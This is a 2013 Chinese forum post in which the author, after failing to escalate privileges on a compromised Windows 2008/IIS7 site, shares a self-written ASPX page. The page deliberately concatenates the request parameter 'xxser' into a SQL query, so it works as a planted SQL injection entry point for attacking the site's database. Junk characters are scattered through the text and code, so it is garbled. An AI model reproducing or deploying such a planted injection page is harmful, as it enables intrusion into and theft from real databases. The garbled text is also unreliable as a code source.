昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
) C& Z7 K" _4 ~" k ^7 N7 v其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
* _. z2 z( J* d( O代码量不多,自己写个拉倒了。烦死了。4 q( F# [9 Y; O& c/ n' U2 C; c, {5 W
3 T3 x* {& @, V
# S1 W! k3 Q% b3 l$ i, d
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">5 Z2 z% ]& z. y2 j5 L2 W
<html xmlns="http://www.w3.org/1999/xhtml">
6 o7 D3 X8 c: s4 \5 T3 h<head runat="server">5 E, f: Y6 h Q! W" E" Z
<title>暗影aspx构造注射专用页面</title>; ]2 g/ q A, ~7 B! ~
</head>
7 R# Y; L+ i+ ?/ `6 y<body>. \/ z4 {: a5 E$ ~
<form id="form1" runat="server">2 A& ?9 y1 ~7 V4 S
<div>
5 d, S, l3 u* u) _ <script language="c#" runat="server">& H5 K; S( D" c, s! |5 n
& ^/ `' ]* V/ j6 S' z void page_init(object sender, EventArgs e)3 e8 p+ Y" m; A. f' H, q$ O
{
. S: Q2 _1 z7 A2 b7 h# c" |/ ~ " k4 X: j! O+ a9 i9 f6 [
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
2 }9 x, y6 ?& c% i- P( b/ P+ y4 }
% T G! e9 z# W* Z0 D conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();1 j* B' ]/ V. x+ v( d3 g1 M
conn.Open();
e/ h/ ~+ s' n / \# K: N8 p/ s+ a0 X( U
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1/ i' J" M, v F4 W+ i% @
4 z. t$ z$ F2 I8 ?* T3 v4 o System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);6 r( h9 h4 I; A4 {5 i, S9 I
int x = command.ExecuteNonQuery();
9 P# P& r6 m4 P8 f7 k8 O# ~ Response.Write(i+"\n"); W3 z$ V8 U6 A F/ L0 B
Response.Write(x);4 O/ Y; G8 a7 d3 k# d
conn.Close();
' F0 `. i: H4 M1 O! ^ }4 i/ b4 F% [2 F0 |9 a9 o
/ y: R7 `; O4 l" e& E# _! k5 ~( @) w
</script>
2 L% O/ g8 F- K. y3 z </div>
4 p9 T2 v" N4 a& U </form>
& B& P! u- b3 q! J$ o4 a0 T: ~3 ?- S</body>5 q: D( k3 P# h9 U; A4 E, H" |. q
</html>6 o; Z# p3 w* q% Z3 V, N4 D
|
发表于 2013-3-20 21:32:01
收藏
支持
反对